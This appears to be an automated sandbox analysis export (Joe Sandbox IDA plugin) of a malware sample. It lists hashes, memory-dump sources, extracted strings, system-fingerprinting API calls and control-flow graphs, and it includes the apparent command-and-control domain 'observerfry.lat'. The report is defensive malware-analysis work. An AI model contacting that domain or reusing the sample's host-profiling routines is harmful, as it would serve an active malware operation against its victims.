                                                                                                                                                                • String ID: $!$"$#$%$%$%$&$&$'$)$*$+$-$-$.$.$/$/$/$/$0$1$1$2$2$3$3$5$6$7$8$9$9$9$:$;$;$;$<$<$<$=$=$=$?$?$@$A$A$B$C$D$D$D$D$E$E$F$F$G$H$J$K$K$L$L$N$O$Q$R$S$S$U$V$W$X$X$Y$Y$Z$[$\$\$\$\$\$\$\$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$`$a$a$c$d$d$e$e$f$g$h$i$i$j$j$k$k$l$l$m$m$n$o$o$q$r$s$u$v$w$y$y${$|$}$~$~
                                                                                                                                                                • API String ID: 0-1985396431
                                                                                                                                                                • Opcode ID: e52975491a40eacf83306e7afdb0a1403b7b06850df3a4b698cec80a15bf4bc4
                                                                                                                                                                • Instruction ID: fd0df879c6591dba4df889ce3ba4b81cae120300a6980f060aa26229da5ef906
                                                                                                                                                                • Opcode Fuzzy Hash: e52975491a40eacf83306e7afdb0a1403b7b06850df3a4b698cec80a15bf4bc4
                                                                                                                                                                • Instruction Fuzzy Hash: 7413AD7150C7C08BD3259B3884443AFBFE1ABD6314F198E6EE4E987382D6B98945CB53
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: #E#G$%"$+A#C$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$observerfry.lat$s$wdnf$~SS}$rp
                                                                                                                                                                • API String ID: 0-3004701125
                                                                                                                                                                • Opcode ID: 50ea8ce02347f7e6514a427454033256e597c80a4618eb5ca76af553ac7cabf3
                                                                                                                                                                • Instruction ID: f2da15b4e0a8a9e019cf4fbdef67d10b98e4a5215ea51038666ec1ea25543efa
                                                                                                                                                                • Opcode Fuzzy Hash: 50ea8ce02347f7e6514a427454033256e597c80a4618eb5ca76af553ac7cabf3
                                                                                                                                                                • Instruction Fuzzy Hash: 01B212B1A08345CFD714CF69C8917ABBBA2FF85314F198A6CE4859B391D7389D02CB91
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                • API String ID: 0-510280711
                                                                                                                                                                • Opcode ID: b6ac8a3892e5cda5dc2e8ecc0ebf6b050ed2961578042101524f3812b885773f
                                                                                                                                                                • Instruction ID: df6f8bd15e5820b809301de4c9faa4a89a39d80573b6936d24e95c245f5cdfb3
                                                                                                                                                                • Opcode Fuzzy Hash: b6ac8a3892e5cda5dc2e8ecc0ebf6b050ed2961578042101524f3812b885773f
                                                                                                                                                                • Instruction Fuzzy Hash: CDB204B1A083408FD724CF28D8917ABB7E6EFD5314F19892DE4C98B392D7359806CB52

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                • API String ID: 0-1565257739
                                                                                                                                                                • Opcode ID: afd81ae666a895e93d4afcae245904206b5414cf951959020f8c2c95abb3565c
                                                                                                                                                                • Instruction ID: 827d45a680cbc43ef99d243c2227dc308f586a60678d0259686b8c4f5ed5b90f
                                                                                                                                                                • Opcode Fuzzy Hash: afd81ae666a895e93d4afcae245904206b5414cf951959020f8c2c95abb3565c
                                                                                                                                                                • Instruction Fuzzy Hash: 5A228B7150C7C08FD3268B29C48176FBBE5AB85314F184D6DE5EA87392D7BA8885CB43

                                                                                                                                                                APIs
                                                                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 009F9550
                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009F958F
                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 009F98DF
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009F98E5
                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009F992E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                • API String ID: 1773362589-1335595022
                                                                                                                                                                • Opcode ID: 1b47a26547b09d86f52c49fb3a39310ecb2714708078a43f67548a4d5cef3791
                                                                                                                                                                • Instruction ID: b2562abcf0ba0a056651aa9fc5d63ec27a3301df4654ea2737054e629eb5d04b
                                                                                                                                                                • Opcode Fuzzy Hash: 1b47a26547b09d86f52c49fb3a39310ecb2714708078a43f67548a4d5cef3791
                                                                                                                                                                • Instruction Fuzzy Hash: 8B222476A083119BE310CF28C881B6BBBE6EFC5314F19892CF6949B391D775D845CB82

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO$}KcU
                                                                                                                                                                • API String ID: 0-18744084
                                                                                                                                                                • Opcode ID: 393ecaecba41936bfa3fa58a88785757775de3d7220b45f5520da69b2b8e1dcd
                                                                                                                                                                • Instruction ID: 2e8bef8f0700f6df5c86879d19c1462d3dfdd34f7da7a07cce3a3ca72d3ff185
                                                                                                                                                                • Opcode Fuzzy Hash: 393ecaecba41936bfa3fa58a88785757775de3d7220b45f5520da69b2b8e1dcd
                                                                                                                                                                • Instruction Fuzzy Hash: D10265B1600B05CFD324CF25D891BABBBF1FB49314F048A2CD5AA8BAA0D735A456CF51

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                • API String ID: 0-1108506012
                                                                                                                                                                • Opcode ID: ca350afeac7aa20c936076556f6c88ba6e75eb411703f66f957a5ed54a43d0ff
                                                                                                                                                                • Instruction ID: 356378b6a8b64346d02ef41d089462907cf25aad130e9c32e4f31dec0cc8583b
                                                                                                                                                                • Opcode Fuzzy Hash: ca350afeac7aa20c936076556f6c88ba6e75eb411703f66f957a5ed54a43d0ff
                                                                                                                                                                • Instruction Fuzzy Hash: 4FB1077164C3898FD3148A68CC8437BBFD297D6328F1D4B2DE6A9473D2C6B9C8858746

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: #E#G$+A#C$=]=_$_^]\$eN$rp
                                                                                                                                                                • API String ID: 0-3333364358
                                                                                                                                                                • Opcode ID: 863b72e49d649009a71ba493e38854434af783d0d83378816e36bdec51eb0391
                                                                                                                                                                • Instruction ID: b25f6e0bf6dc95eaca69de60893db5dabc539ed72ff943e1019f3a99f0a1152b
                                                                                                                                                                • Opcode Fuzzy Hash: 863b72e49d649009a71ba493e38854434af783d0d83378816e36bdec51eb0391
                                                                                                                                                                • Instruction Fuzzy Hash: 0A4236B1A04205CFD714CF69C891AAABBB2FF89310F1982ACD4459B3A5D738DD52CB91

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 009E3C37
                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 009E3CB1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID: #E#G$+A#C$=]=_$eN$rp
                                                                                                                                                                • API String ID: 237503144-3451580660
                                                                                                                                                                • Opcode ID: cc596c52e29dc1bac6ecbf2386bc0ebff5092cf32d75bdb25451fa0df940b346
                                                                                                                                                                • Instruction ID: 11c92bedc6fc699ded8a0df27c12eaffd01ca5eee08a34e0992f5e8c79bc4bc7
                                                                                                                                                                • Opcode Fuzzy Hash: cc596c52e29dc1bac6ecbf2386bc0ebff5092cf32d75bdb25451fa0df940b346
                                                                                                                                                                • Instruction Fuzzy Hash: C51206B1E11215CFDB14CF69C882AAABBB2FF85310F1982ACD445AF355D7349942CBD1

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1553 9cce45-9cce78 call 9f3fd0 call 9c9780 CoUninitialize 1558 9cce80-9ccee4 1553->1558 1558->1558 1559 9ccee6-9ccef7 1558->1559 1560 9ccf00-9ccf20 1559->1560 1560->1560 1561 9ccf22-9ccf64 1560->1561 1562 9ccf70-9ccf92 1561->1562 1562->1562 1563 9ccf94-9ccf9c 1562->1563 1564 9ccf9e-9ccfa2 1563->1564 1565 9ccfbb-9ccfc3 1563->1565 1566 9ccfb0-9ccfb9 1564->1566 1567 9ccfdb-9ccfe6 1565->1567 1568 9ccfc5-9ccfc6 1565->1568 1566->1565 1566->1566 1570 9ccfec-9ccfed 1567->1570 1571 9cd08a 1567->1571 1569 9ccfd0-9ccfd9 1568->1569 1569->1567 1569->1569 1572 9ccff0-9ccff9 1570->1572 1573 9cd08d-9cd095 1571->1573 1572->1572 1574 9ccffb 1572->1574 1575 9cd0ad 1573->1575 1576 9cd097-9cd09b 1573->1576 1574->1573 1578 9cd0b0-9cd0bb 1575->1578 1577 9cd0a0-9cd0a9 1576->1577 1577->1577 1579 9cd0ab 1577->1579 1580 9cd0bd-9cd0bf 1578->1580 1581 9cd0cb-9cd0d7 1578->1581 1579->1578 1582 9cd0c0-9cd0c9 1580->1582 1583 9cd0d9-9cd0db 1581->1583 1584 9cd0f1-9cd1b1 1581->1584 1582->1581 1582->1582 1585 9cd0e0-9cd0ed 1583->1585 1586 9cd1c0-9cd1d2 1584->1586 1585->1585 1587 9cd0ef 1585->1587 1586->1586 1588 9cd1d4-9cd1f4 1586->1588 1587->1584 1589 9cd200-9cd252 1588->1589 1589->1589 1590 9cd254-9cd28a call 9cb7e0 1589->1590
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                • String ID: 6=.)$<1!9$`{tu$observerfry.lat
                                                                                                                                                                • API String ID: 3861434553-2148362831
                                                                                                                                                                • Opcode ID: 1104edbc528dc054b640755410204fe07d5bcfb789c7cadfc645c0b84f9b1e5e
                                                                                                                                                                • Instruction ID: 426b1a5a0dc321cce0eae792728a54e67e478ed5cca1714524c6760295737946
                                                                                                                                                                • Opcode Fuzzy Hash: 1104edbc528dc054b640755410204fe07d5bcfb789c7cadfc645c0b84f9b1e5e
                                                                                                                                                                • Instruction Fuzzy Hash: 02A1F1B46057818FDB16CF29C4D0B62BFE2BF96300B1885ACC4D64F75AD339A846CB52

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1621 9c8600-9c8611 call 9fd9a0 1624 9c8a48-9c8a4a 1621->1624 1625 9c8617-9c861e call 9f62a0 1621->1625 1628 9c8624-9c864a 1625->1628 1629 9c8a31-9c8a38 1625->1629 1637 9c864c-9c864e 1628->1637 1638 9c8650-9c887f 1628->1638 1630 9c8a3a-9c8a40 call 9c7f60 1629->1630 1631 9c8a43 call 9fe080 1629->1631 1630->1631 1631->1624 1637->1638 1640 9c8880-9c88ce 1638->1640 1640->1640 1641 9c88d0-9c891d call 9fc540 1640->1641 1644 9c8920-9c8943 1641->1644 1645 9c8964-9c897c 1644->1645 1646 9c8945-9c8962 1644->1646 1648 9c8a0d-9c8a25 call 9c9d00 1645->1648 1649 9c8982-9c8a0b 1645->1649 1646->1644 1648->1629 1652 9c8a27 call 9ccb90 1648->1652 1649->1648 1654 9c8a2c call 9cb7b0 1652->1654 1654->1629
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: b]u)$}$}
                                                                                                                                                                • API String ID: 3664257935-2900034282
                                                                                                                                                                • Opcode ID: aca78305a520b0a176bc375d1699c5dd5cad41614050c45558a77dc74bc513f5
                                                                                                                                                                • Instruction ID: 188c5a0c56250aef254fa0e78f1a4664662ad8476ec8755af0452f60df13e780
                                                                                                                                                                • Opcode Fuzzy Hash: aca78305a520b0a176bc375d1699c5dd5cad41614050c45558a77dc74bc513f5
                                                                                                                                                                • Instruction Fuzzy Hash: 7CC1F673E187154BC708DF69C84135AF7D6ABC8710F0AC92DA898EB391EA74DC058BC6

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1656 9ed34a-9ed362 1657 9ed370-9ed382 1656->1657 1657->1657 1658 9ed384-9ed389 1657->1658 1659 9ed39b-9ed3a7 1658->1659 1660 9ed38b-9ed38f 1658->1660 1662 9ed3a9-9ed3ab 1659->1662 1663 9ed3c1-9ed40f call 9ffe00 GetPhysicallyInstalledSystemMemory 1659->1663 1661 9ed390-9ed399 1660->1661 1661->1659 1661->1661 1665 9ed3b0-9ed3bd 1662->1665 1668 9ed410-9ed44d 1663->1668 1665->1665 1667 9ed3bf 1665->1667 1667->1663 1668->1668 1669 9ed44f-9ed498 call 9de960 1668->1669 1672 9ed4a0-9ed551 1669->1672 1672->1672 1673 9ed557-9ed55c 1672->1673 1674 9ed55e-9ed568 1673->1674 1675 9ed57d-9ed583 1673->1675 1676 9ed570-9ed579 1674->1676 1677 9ed586-9ed58e 1675->1677 1676->1676 1678 9ed57b 1676->1678 1679 9ed5ab-9ed5b3 1677->1679 1680 9ed590-9ed591 1677->1680 1678->1677 1681 9ed5cb-9ed611 1679->1681 1682 9ed5b5-9ed5b6 1679->1682 1683 9ed5a0-9ed5a9 1680->1683 1685 9ed620-9ed653 1681->1685 1684 9ed5c0-9ed5c9 1682->1684 1683->1679 1683->1683 1684->1681 1684->1684 1685->1685 1686 9ed655-9ed65a 1685->1686 1687 9ed65c-9ed65d 1686->1687 1688 9ed66d 1686->1688 1689 9ed660-9ed669 1687->1689 1690 9ed670-9ed67a 1688->1690 1689->1689 1691 9ed66b 1689->1691 1692 9ed67c-9ed67f 1690->1692 1693 9ed68b-9ed73c 1690->1693 1691->1690 1694 9ed680-9ed689 1692->1694 1694->1693 1694->1694
                                                                                                                                                                APIs
                                                                                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 009ED3EE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                • String ID: ><+
                                                                                                                                                                • API String ID: 3960555810-2918635699
                                                                                                                                                                • Opcode ID: d68d344a655eeef9e5c4acdf662e6c2b6824ab481b50b70c2be6e3464aff00a2
                                                                                                                                                                • Instruction ID: 5b2f772de3151e7f319b2f976984b44c4f8d6d229b42478068b3c70bf9c371ad
                                                                                                                                                                • Opcode Fuzzy Hash: d68d344a655eeef9e5c4acdf662e6c2b6824ab481b50b70c2be6e3464aff00a2
                                                                                                                                                                • Instruction Fuzzy Hash: E6C1F3756057818FD725CF2AC490762FBE2BF9A314F28859DD4DA8B792C739E802CB50
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: @Ukx$
                                                                                                                                                                • API String ID: 2994545307-3636270652
                                                                                                                                                                • Opcode ID: a486379789fd137f291eed0918c32eeead3189077f6fd32b6b68b9115c865220
                                                                                                                                                                • Instruction ID: 768b59acdd96f9143959af3975e32a27fe0f177e195efe3f0b427526a15a4fd9
                                                                                                                                                                • Opcode Fuzzy Hash: a486379789fd137f291eed0918c32eeead3189077f6fd32b6b68b9115c865220
                                                                                                                                                                • Instruction Fuzzy Hash: 5FB15632B083184BC718CE28ECE16BBB7A3EBC5314F19C63CE99657395DA359C068791
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: EXCm$_^]\
                                                                                                                                                                • API String ID: 2994545307-2575524537
                                                                                                                                                                • Opcode ID: b4092ea6b0e98b687be819191738abd9d3f200f891ba2223f3aaac43ffdaed7d
                                                                                                                                                                • Instruction ID: 413eb2cebb09398b4b356be86103352efee230c113081b44cbf82921ea87ad34
                                                                                                                                                                • Opcode Fuzzy Hash: b4092ea6b0e98b687be819191738abd9d3f200f891ba2223f3aaac43ffdaed7d
                                                                                                                                                                • Instruction Fuzzy Hash: 8F411BB02047829BDB36CF26C891B76BBA2AF56300F2C85ACD5D25B693D7316C47D750
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 7CDF789295067FF1BEBA0C6A975F1733
                                                                                                                                                                • API String ID: 0-3274981394
                                                                                                                                                                • Opcode ID: e14707817e7e041a3d91cfb97a96b4acf9cd4130bfc61d716a9637062b23cbad
                                                                                                                                                                • Instruction ID: d937db2eec098bcba48ddc066bad292ac04ebe6974154ac8bd23e30fced22acd
                                                                                                                                                                • Opcode Fuzzy Hash: e14707817e7e041a3d91cfb97a96b4acf9cd4130bfc61d716a9637062b23cbad
                                                                                                                                                                • Instruction Fuzzy Hash: 47812A756407418BD3258B38CC92BA7B7E2FFDA315F0DC96CD4864B347E639A8028B51
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                • API String ID: 2994545307-3116432788
                                                                                                                                                                • Opcode ID: e61ceca4900691a155cd790096507d7ccfab50423b45c5ed76d66db3cc7d0dc3
                                                                                                                                                                • Instruction ID: 83ae7afd6df1cd166616b2f0aa6324746e51513e185f16763b6ddaa1c5d3ea32
                                                                                                                                                                • Opcode Fuzzy Hash: e61ceca4900691a155cd790096507d7ccfab50423b45c5ed76d66db3cc7d0dc3
                                                                                                                                                                • Instruction Fuzzy Hash: D8713BB1A0C3445BD7159BAADC92B3BF6A5DF81318F18883CE58687292E639DC058753
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
